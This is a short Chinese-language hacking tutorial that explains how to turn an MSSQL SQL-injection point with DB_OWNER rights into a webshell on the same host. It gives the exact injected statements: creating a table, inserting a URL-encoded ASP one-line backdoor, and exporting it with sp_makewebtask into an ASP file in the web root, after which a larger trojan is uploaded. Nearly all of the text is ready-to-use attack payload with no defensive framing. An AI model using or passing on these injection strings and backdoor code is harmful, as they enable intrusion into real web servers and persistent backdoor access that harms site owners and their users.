MSSQL的注入是一种非常复杂和有效的入侵技术,其作用当然不仅仅只是通过注入点得到管理用的密
码,再用用密码登陆网站的管理后台这种比较笨的利用方法.当MSSQL注入点为DB-ONWER权限时,而同时数据库
和WEB是在同一台主机上, 满足这二个条件时,可能通过得到WEB路径,再将一字话木马写入一个表,再利用
MSSQL语句将其导出为一个脚本文件的方法得到一个后门,再上传大木马的方法得到WEBSEHLL.
第一步:确定网站的WEB路径,通过DIRTREE逐个查看硬盘及文件夹查找WEB目录
第二步.得到WEB路径后,建一个表.字段类型为CHAR长度为255,这个表将来用作插入一句话木马,使用语句
;create table pcguest(pc char(255));--
第三步,将一句话木马插入表中,使用
;insert into pcguest(pc) values ('<%execute request("p")%>')--
其中<%execute request("p")%>就是一句话木马,但是由于是在链接地址提交的,所以涉及到字符转
换问题,将一句话木马中的< > % " 字符转换成unicode格式,,如修改后的一句话木马代码为
%3c%25execute request(%22p%22)%25%3e
完整的MSSQL语句为
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
第四步,将表导出为一个ASP的文件
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
最后在网页上连接ASP一句话木马上传大马,即拿到WEBSEHLL